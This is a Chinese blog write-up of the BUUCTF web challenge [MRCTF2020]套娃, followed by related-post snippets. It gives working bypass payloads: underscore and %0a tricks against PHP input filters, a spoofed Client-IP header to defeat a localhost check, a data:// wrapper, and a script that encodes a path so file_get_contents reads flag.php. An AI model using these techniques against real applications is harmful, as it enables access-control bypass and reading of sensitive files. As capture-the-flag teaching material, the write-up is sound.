BUUCTF [MRCTF2020]套娃

最新推荐文章于 2024-06-11 14:09:44 发布
最新推荐文章于 2024-06-11 14:09:44 发布
阅读量686 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/121719370
版权
本文详细介绍了如何利用PHP的字符串解析特性进行漏洞绕过,包括使用%20和+字符替代下划线,以及通过%0a截断。此外,还展示了如何通过JSFuck在控制台执行代码,并给出了一段PHP代码示例,演示了如何通过client-ip头和base64编码绕过权限检查并读取敏感文件。同时,文章还涉及了如何利用change函数反向构造字符串以获取flag。
摘要由CSDN通过智能技术生成

打开后在源码发现:
在这里插入图片描述
这里就要利用php解析字符串的特性bypass,
具体参考:https://www.freebuf.com/articles/web/213359.html
经过测验可以使用下列字符代替下划线来绕过第一个if的判断

. %20(空格的url编码)+

第二个if可以看到存在 ^ $,可以使用%0a截断绕过
payload:

?b+u+p+t=23333%0a

来到secrettw.php
在源码发现一段jsfuck,直接在控制台运行
在这里插入图片描述
随便post一个值看到源码:

<?php
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

1.通过client-ip:127.0.0.1来绕过ip的限制;
2.通过data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=来绕过第二个判断
3.然后通过file_get_contents读取flag.php的内容,但是这里经过了cahnge函数,所以我们要在chang一下,直接写脚本:

<?php
$str='flag.php';
$re='';
for($i=0;$i<strlen($str);$i++)
{
	$re.=chr(ord($str[$i])-2*$i);
}
echo base64_encode($re);
?>

得到:ZmpdYSZmXGI=
所以在bp里面增加client-ip,在传参
在这里插入图片描述
得到flag
在这里插入图片描述

早川秋zcq
关注
专栏目录
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3087
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 525
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
buuctf-web-[MRCTF2020]套娃
weixin_46079186的博客
07-23 242
打开题目,查看源代码 $query = $_SERVER['QUERY_STRING']; # 查询(query)的字符串(URL 中第一个问号 ? 之后的内容)。 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); # substr_count 计算出现的次数,这里计算$query,出现_的次数%5f 也是_ 这里不能等于0.
BUUCTF:[MRCTF2020]套娃
末初的CSDN博客
09-19 1080
BUUCTF:[MRCTF2020]套娃 Writeup
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 779
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
[MRCTF2020]千层套路
zip471642048的博客
06-23 803
题目地址 : https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF 最后解出来了一个qr.zip 使用脚本拼图
[MRCTF2020]套娃
yym68686
08-11 316
[MRCTF2020]套娃 打开网页,没有发现什么特别的,按F12打开开发者工具,查看源代码,发现注释: <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && pr
[MRCTF2020]套娃1
最新发布
alwtj的博客
06-11 870
而正则表达式我们可以通过%0a去绕过,%0a是换行符,当PHP代码执行的时候23333%0a!而最后的change函数,是将我们传入的file值进行base64解码后,又将原本字符串替换为在ascii表中的原value+2的对应字符。这里要求我们的ip地址为本地ip地址,且传入name=2333,value=todat is a happy day 的内容。preg_match('/^23333$/', $_GET['b_u_p_t'])) 是匹配传入的value是23333。发现了不得了的东西~
BUU-WEB-[MRCTF2020]套娃
qq_24033605的博客
05-19 173
[MRCTF2020]套娃 查看源码,发现注释里有php审计内容。 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET
[MRCTF2020]套娃 1
shinygod的博客
04-01 801
知识点:Client-ip,data://, $_SERVER总结 <!-- //1st $query = $_SERVER['QUERY_STRING'];//获取参数 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ //参数中不能有_和%5f die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &&
审计练习16——[MRCTF2020]套娃
qq_43756333的博客
06-12 454
平台:buuoj.cn 打开靶机源码处php代码 第一个if如果传入的参数出现_和它的url编码%5f,则打印Y0u are So cutE! 绕过:用.或空格代替_ 第二个if要b_u_r_t的值为23333但添加了正则匹配,用^和$来界定23333的首尾,代表了“行的开头和结尾”,只匹配一行,因此%0a换行绕过 打开secrettw.php 提示本地,xff不行,用client-ip 下面的jsfuck代码直接控制台输出 那么就post一个Merak随便传个值 回显php,代码如下 <?
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1163
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
BUUCTF—————[watevrCTF 2019]Repyc
yhfgs的博客
12-30 1174
1.是pyc文件用uncompyle6反编译。 2.得到py文件,发现是有一大堆乱码。无从下手。 # uncompyle6 version 3.7.4 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.7.8 (tags/v3.7.8:4b47a5b6ba, Jun 28 2020, 08:53:46) [MSC v.1916 64 bit (AMD64)] # Embedded file name: circ.py # Compi.
BUUCTF------相册
qq_64558075的博客
12-05 1464
buuctf 相册
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,你可以定义一个结构体来表示一个套娃人偶,其中包含一个指向更小人偶的指针。例如: ```c struct Doll { int size; struct Doll* smaller_doll; }; ``` 然后,你可以创建一组套娃人偶对象,并将它们连接起来形成套娃的层次结构。例如: ```c struct Doll doll1 = { 1, NULL }; struct Doll doll2 = { 2, &doll1 }; struct Doll doll3 = { 3, &doll2 }; // 依此类推... ``` 在这个例子中,doll3 是最外层的人偶,它包含了指向 doll2 的指针,而 doll2 又包含了指向 doll1 的指针。 最后,你可以通过遍历套娃的层次结构来打印出每个人偶的大小。例如: ```c struct Doll* current_doll = &doll3; while (current_doll != NULL) { printf("Doll size: %d\n", current_doll->size); current_doll = current_doll->smaller_doll; } ``` 这样,你就可以按照从外到内的顺序打印出每个人偶的大小。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值